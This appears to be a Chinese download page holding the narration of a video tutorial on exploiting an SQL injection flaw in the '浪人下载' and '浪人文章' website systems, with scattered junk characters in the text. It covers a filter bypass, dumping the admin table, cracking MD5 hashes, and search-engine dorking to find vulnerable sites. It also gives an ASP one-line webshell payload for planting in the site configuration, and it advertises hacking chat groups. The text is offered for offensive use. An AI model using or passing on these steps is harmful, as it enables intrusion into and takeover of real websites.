浪人下载文章的0DAY漏洞利用

软件简介：
6 I7 q% ^, \+ B0 C6 E! W今天做的动画是浪人下载和浪人文章的0DAY漏洞利用
其实也不是什么0DAY啦，就是一个注入漏洞
浪人：www.lre.cn
2 ~$ z- z; L4 l. _! r大家可以快进看
9 L  {/ ^8 O( e' |0 f$ y先随便点一个软件下载
! {" `5 c3 `; \% l" \' V: K" L官方都更新到2.4了，但是还是官方自己再用，不过也有漏洞哦
把下载地址复制到明小子里面，把I改成%69
看到了吗，没有改之前是不能注入额
恭喜,该URL可以注入!
0 n* ?/ @7 d4 q6 J* B6 T数据库类型:Access数据库
# K8 ^3 J' ^, Y( |/ o8 p9 Y下面来讲讲关键字的搜索
9 C& d0 ]( W) n; H# p6 ~! K1 Y下载链接若长时间无响应，请稍候再试；无法下载或是其它问题，请给我留言.....就是这一句了
在BAIDU上搜搜看
$ T  h& S, y; Q# p# j百度一下，找到相关网页约6,030篇
, M4 H/ h$ A! L再看看GOOGLE
网页 约有12,800项符合
看到了吧
下面正式进入正题，我就不打字了
) z# F. }- X# ?  I7 h7 u( b: c大家仔细看
我在本机上测试的
+ F+ y3 g) D' A2 }Admin_Info
是管理员表
4 q; A& d7 y, I# v密码是MD5加密的，在WWW.CMD5.COM上可以解密
郁闷。。。。不知道为什么本机老跑不出来
1 J% J8 _3 X1 n1 h5 ]反正我知道密码啦，下面开始拿webshell
如果你们猜的话一定可以猜出来的
1 N. O: ?: t0 g本机猜出来了
) o! A: c7 |" Q+ M( v/ C5 L# e. H4 A有些后台是ADMIN.ASP
' m+ g. x, t- L' Q还有的是LOGIN.ASP
版本不同啦
后台有两种方法拿WEBSHELL
看我演示
OK，这是第一种
' @) c- k! N6 d4 R8 F下面讲第二种
在网站配置信息里
插入一句话
不是光查
/ a' j. R& d5 ~/ x& {3 @# Y7 \%eval request(#)%
# j4 H9 w* H; Z+ h- W7 G- ]9 o这样是不行的
* T7 T* U% Z3 }3 j5 F+ p8 a看演示
sss%%eval request(#)%%ViewMessage=c
下载说明里面写上上面的一句话
我都已经写好了
0 ^4 Y+ D3 s6 v, f8 @http://localhost/down/Inc\Config.asp
这个是我一句话的地址
4 B+ b1 v, o( B7 N: Q1 p然后连接就可以了
3 m3 h( W+ B/ }6 P. U7 Z' \5 z88
邪恶领域［一］群
群号：8494875
邪恶领域［二］群
群号：5501649
8 M5 h& c* L# P补充一下
浪人文章也有一样的漏洞
88
下载地址：

2008-8-18 13:41 上传 浪人下载文章的0DAY漏洞利用.rar

文件大小:

未知

下载次数:

0

下载权限:

版本vip会员

VIP专享 检测资源

有些游戏资源需要vip下载开通请点击开通vip

VIP专享,点击开通vip

确认